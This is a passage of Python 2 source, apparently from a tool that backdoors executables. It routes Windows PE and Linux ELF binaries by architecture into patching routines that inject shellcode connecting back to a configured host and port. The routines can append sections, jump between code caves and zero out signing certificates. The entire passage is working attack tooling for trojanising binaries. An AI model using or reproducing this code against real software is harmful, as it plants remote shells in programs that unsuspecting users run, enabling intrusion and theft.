cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx64['SHELL'],
HOST=self.WindowsIntelx64['HOST'],
PORT=int(self.WindowsIntelx64['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
)
result = targetFile.run_this()
elif (machineType == 0x14c and
self.WindowsType.lower() in ['all', 'x86']):
add_section = False
cave_jumping = False
#add_section wins for cave_jumping
#default is single for BDF
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
add_section = True
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
cave_jumping = True
targetFile = pebin.pebin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.WindowsIntelx86['SHELL'],
HOST=self.WindowsIntelx86['HOST'],
PORT=int(self.WindowsIntelx86['PORT']),
ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType,
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.WindowsIntelx86['SUPPLIED_SHELLCODE']),
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
)
result = targetFile.run_this()
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=True)
targetFile.support_check()
if targetFile.class_type == 0x1:
#x86
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx86['SHELL'],
HOST=self.LinuxIntelx86['HOST'],
PORT=int(self.LinuxIntelx86['PORT']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx86['SUPPLIED_SHELLCODE']),
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
elif targetFile.class_type == 0x2:
#x64
targetFile = elfbin.elfbin(FILE=binaryFile,
OUTPUT=os.path.basename(binaryFile),
SHELL=self.LinuxIntelx64['SHELL'],
HOST=self.LinuxIntelx64['HOST'],
PORT=int(self.LinuxIntelx64['PORT']),
SUPPLIED_SHELLCODE=self.convert_to_Bool(self.LinuxIntelx64['SUPPLIED_SHELLCODE']),
IMAGE_TYPE=self.LinuxType
)
result = targetFile.run_this()
return result
except Exception as e:
print 'Exception', str(e)
logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
return None